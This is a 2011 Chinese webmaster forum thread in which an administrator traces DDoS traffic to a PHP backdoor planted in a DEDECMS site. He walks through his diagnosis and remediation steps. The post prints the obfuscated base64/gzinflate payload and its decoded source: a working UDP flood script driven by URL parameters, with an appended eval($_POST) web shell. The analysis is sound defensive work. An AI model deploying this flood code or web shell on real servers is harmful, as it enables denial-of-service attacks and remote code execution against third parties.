[落伍原创] 技术贴：警惕UDP攻击型PHP木马 [复制链接]
查看:7918 | 回复:92

stuhack · 发表于 2011-4-19 16:34:24

本帖最后由 stuhack 于 2011-4-19 16:38 编辑

最近有几台虚拟主机遭受Ddos攻击刚开始以为是客户站点有问题导致攻击后来发现是一个PHP文件导致

说说过程：
1.利用MRTG监控发现网卡流量100M 狂丢包偶尔通几个包
2.SSH登录服务器用iftop统计是哪个IP流量最高
3.iptables -I INPUT -s 1.1.1.1 -j DROP
4.cat /var/log/httpd/access_log |grep 1.1.1.1
5.发现DEDECMS的plus目录下有一个lndex.php 访问地址为/plus/lndex.php?ip=1.1.1.1&port=80&time=600
6.lndex.php代码为

<?php
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));

复制代码

7.经破解的代码为

<?php
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time(\'h:i:s\')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \\n";
?>
<?php eval($_POST[ddos])?>

复制代码

8.也就是说只要访问网站的/plus/lndex.php?ip=1.1.1.1&port=80&time=600 就会UDP攻击1.1.1.1
9.关闭网站修复DEDECMS漏洞 php.ini 修改allow_url_fopen = Off 或者是用iptables封掉UDP

bgsnbqk · 发表于 2011-4-19 16:34:40

很严重啊

钱图无量 · 发表于 2011-4-19 16:35:12

很严重啊

锅牛 · 发表于 2011-4-19 16:35:12

鉴定完毕

正版肥猫 · 发表于 2011-4-19 16:35:28

严重的紧啊

精 · 发表于 2011-4-19 16:36:03

我给你个精

collbird · 发表于 2011-4-19 16:37:39

精华帖啊

*发表于 2011-4-19 16:37:53* | 来自中国广东广州 · 发表于 2011-4-19 16:37:53

提示: 作者被禁止或删除内容自动屏蔽

6677 · 发表于 2011-4-19 16:38:00

抢楼，顶

绿巨人 · 发表于 2011-4-19 16:38:07

学习了

百独托管7500 紫田网络	超高转化播放器收cps[推荐]	速盾CDN 免实名免备防屏蔽	阿里云爆款特卖9.9元封顶	提升alexa、IP流量7Q5团队
【腾讯云】中小企福利专场	【腾讯云】多款产品1折起	高防随时退换好耶数据	小飞国外网赚带你月入万元	炎黄网络4H4G10M 99每月
香港带宽CN2/美国站群优惠	中客数据中心服务器租用	联盟系统移动广告平台中易	企业专场腾讯云服务器2.5折	九九数据工信部正规资质
腾讯云新用户大礼包代金券	高价收cpa注册量高价展示	【腾讯云】2核2G/9.93起	租服务器找45互联随时退换	阿里云短信服务验证秒达

[落伍原创] 技术贴：警惕UDP攻击型PHP木马 [复制链接]
查看:7918 | 回复:92

评分

浏览过的版块

QQ绑定

落伍手机绑定

落伍者

落伍草根英雄

落伍热心人

牛淫该用户已被删除	发表于 2011-4-19 16:37:53 \| 来自中国广东广州提示: 作者被禁止或删除内容自动屏蔽
牛淫该用户已被删除

[落伍原创] 技术贴：警惕UDP攻击型PHP木马 [复制链接] 查看:7918 | 回复:92

评分

浏览过的版块

QQ绑定

落伍手机绑定

落伍者

落伍草根英雄

落伍热心人

[落伍原创] 技术贴：警惕UDP攻击型PHP木马 [复制链接]
查看:7918 | 回复:92